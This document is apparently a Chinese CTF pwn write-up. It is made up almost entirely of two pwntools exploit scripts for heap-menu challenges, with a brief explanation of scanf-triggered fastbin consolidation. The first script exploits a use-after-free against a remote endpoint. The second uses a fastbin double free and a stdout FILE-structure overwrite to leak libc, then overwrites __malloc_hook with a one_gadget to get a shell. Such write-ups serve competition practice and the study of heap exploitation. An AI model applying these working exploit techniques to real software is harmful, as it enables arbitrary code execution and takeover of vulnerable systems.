简单的uaf
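from pwn import *  # fixed: the pasted line read "rom pwn import *" (missing 'f'), a SyntaxError
context.terminal = ['tmux', 'splitw', '-h']
#p=process('./sg')
# Remote endpoint as given in the writeup; the local-process line above is kept for reference.
p=remote('183.129.189.60',10029)
elf=ELF('./sg')
libc=elf.libc  # pwntools resolves the libc the binary links against; only valid for that build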
def add(size,name,mess):
    """Menu option 1: create an entry with the given size, name and message.

    Every value is written on the module-level tube ``p`` after the program's
    prompt; ``size`` is converted to its decimal string first.
    """
    p.sendlineafter(': ','1')
    for answer in (str(size), name, mess):
        p.sendlineafter(':', answer)
def show():
    """Menu option 2: ask the program to print its entries.

    No index is sent; the original author had that step commented out.
    """
    option = '2'
    p.sendlineafter(': ', option)
def delete(idx):
    """Menu option 3: delete the entry at index ``idx`` (sent as a decimal string)."""
    exchange = ((': ', '3'), (':', str(idx)))
    for prompt, answer in exchange:
        p.sendlineafter(prompt, answer)
# Interaction sequence. Order matters: every helper blocks on a program
# prompt, so any mismatch with the binary's menu text hangs the script.
add(0x28,'doudou2','doudou')
add(0x68,'doudou1','doudou1')
#add(0x98,'doudou','doudou')
#add(0x18,'dd','aa')
delete(0)
add(0x98,'doudou3','doudou3')
add(0x28,'doudou4','doudou4')
delete(2)
delete(3)
delete(0)
show()
# Leak parsing: keep the 6 bytes ending in 0x7f, zero-extend to 8 bytes
# and subtract a constant. 0x3c4b78 (and 0xf1207 below) are offsets of one
# specific libc build, so they only hold for this particular remote target.
# NOTE(review): str/bytes are mixed here (Python 2 pwntools style); on
# Python 3 recvuntil() returns bytes and the '\x7f' / '\x00' literals would
# need to be bytes too.
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x3c4b78
system=libcbase+libc.sym['system']  # computed but not referenced afterwards
malloc_hook=libcbase+libc.sym['__malloc_hook']
one_gadget=libcbase+0xf1207
add(0x68,'doudou5','doudou6')#4
#add(0x68,'doduou6','doudou7')#5
delete(1)
delete(4)
delete(1)
add(0x68,p64(malloc_hook-0x23),'dddd')
add(0x68,'aa','aa')
add(0x68,'aa','doudou')
add(0x68,'a'*19+p64(one_gadget),'doudou')
log.success('libcbase: '+hex(libcbase))
# One last menu selection is sent directly before handing the tube to the user.
p.sendlineafter(': ','1')
p.interactive()
通过scanf函数触发malloc申请一个largebin大小的chunk,会将fastbin的chunk放入unsorted bin,然后切割申请堆块;double free写IO泄漏libc,之后就是正常攻击了。下面是大师傅的脚本(改动了一下)
到了这一步,说明需要分配的是一块大的内存,或者 small bins 中找不到合适的 chunk。于是,ptmalloc 首先会遍历 fast bins 中的 chunk,将相邻的 chunk 进行合并, 并链接到 unsorted bin 中,
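from pwn import *
context.log_level = 'DEBUG'
#context.terminal=['tmux','splite','-h']
context.terminal = ['tmux', 'splitw', '-h']
# Tube handle shared with pwn() through `global p`. It is None (not the
# integer 0) until a process has been spawned, so the retry loop can tell
# "no process yet" apart from a live tube that must be closed.
p = None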
def pwn():
    """Run one attempt against a freshly spawned ./babypwn process.

    Returns True after the interactive session ends. Any exception raised by
    the I/O helpers propagates to the caller, which restarts the attempt.
    The statement order is the whole point of this function: each helper
    blocks on a program prompt, so nothing here can be reordered.
    """
    global p
    def menu(ch):
        # Select a menu entry by number.
        p.sendlineafter('choice :',str(ch))
    def new(size,name,content,sign=1):
        # Menu 1. Size and name are both answered after the same prompt text;
        # the name goes out with sendafter (no trailing newline). With sign=0
        # the content is sent without waiting for a prompt — that branch is
        # not exercised in this script.
        menu(1)
        p.sendlineafter("game's name:",str(size))
        p.sendafter("game's name:",name)
        if sign:
            p.sendlineafter("game's message:",content)
        else:
            p.sendline(content)
    def free(index):
        # Menu 2: release the entry at the given index.
        menu(2)
        p.sendlineafter('index:',str(index))
    p=process('./babypwn')
    elf=ELF('./babypwn')
    libc=elf.libc  # only meaningful for the libc build the local binary resolves to
    new(0x28,'doudou','aaa')#0
    new(0x68,'doudou2','bbb')#1
    new(0x68,'doudou3','cccc')#2
    new(0x68,'doudou4','ffff')
    free(2)
    # Menu 1 answered by hand with an oversized size input (0x500 digits).
    menu(1)
    p.sendlineafter("game's name:",'0'*0x500)
    free(0)
    new(0x68,'\xDD\x25','aaa')
    free(1)
    free(3)
    free(1)
    new(0x68,'\x30','aaa')
    new(0x68,'dd','dd')
    new(0x68,'dd','dd')
    new(0x68,'dd','dd')
    # Menu 1 again, with the name field sent as raw bytes (no newline).
    menu(1)
    p.sendlineafter("game's name:",str(0x68))
    p.sendafter("game's name:",'\x00'*0x33 + p64(0xFBAD1800) + p64(0)*3 + '\x88')
    # p.sendlineafter("game's message:",'123123')
    # Leak parsing: 6 bytes ending in 0x7f, zero-extended, minus a constant.
    # 0x3c48e0 and 0xf1207 below are offsets of one specific libc build.
    # NOTE(review): str/bytes are mixed (Python 2 pwntools style); on
    # Python 3 the '\x7f' / '\x00\x00' literals would have to be bytes.
    libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-0x3c48e0
    log.success('libcbase: '+hex(libcbase))
    malloc_hook=libcbase+libc.sym['__malloc_hook']
    one_gadget=libcbase+0xf1207
    # free(1)
    realloc=libcbase+libc.sym['__libc_realloc']
    # The message prompt left open by the raw sendafter above is answered now.
    p.sendlineafter("game's message:",'123123')
    free(1)
    free(3)
    free(1)
    new(0x68,p64(malloc_hook-0x23),'aaaa')
    new(0x68,'dd','dd')
    new(0x68,'dd','dd')
    new(0x68,'a'*11+p64(one_gadget)+p64(realloc+4),'ccc')
    p.interactive()
    return True
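if __name__=="__main__":
    # Retry until pwn() reports success. A failed attempt tears down its
    # process before the next one is spawned. The loop is unbounded, as in
    # the original; interrupt it manually if the target never cooperates.
    while 1:
        try:
            if pwn():
                break
        except Exception as e:
            log.warning('attempt failed: %s', e)
            # `p` is the module-level placeholder (0/None) until pwn() has
            # spawned a process; calling .close() on it would raise a second,
            # unrelated AttributeError and abort the retry loop.
            if hasattr(p, 'close'):
                p.close()
            continue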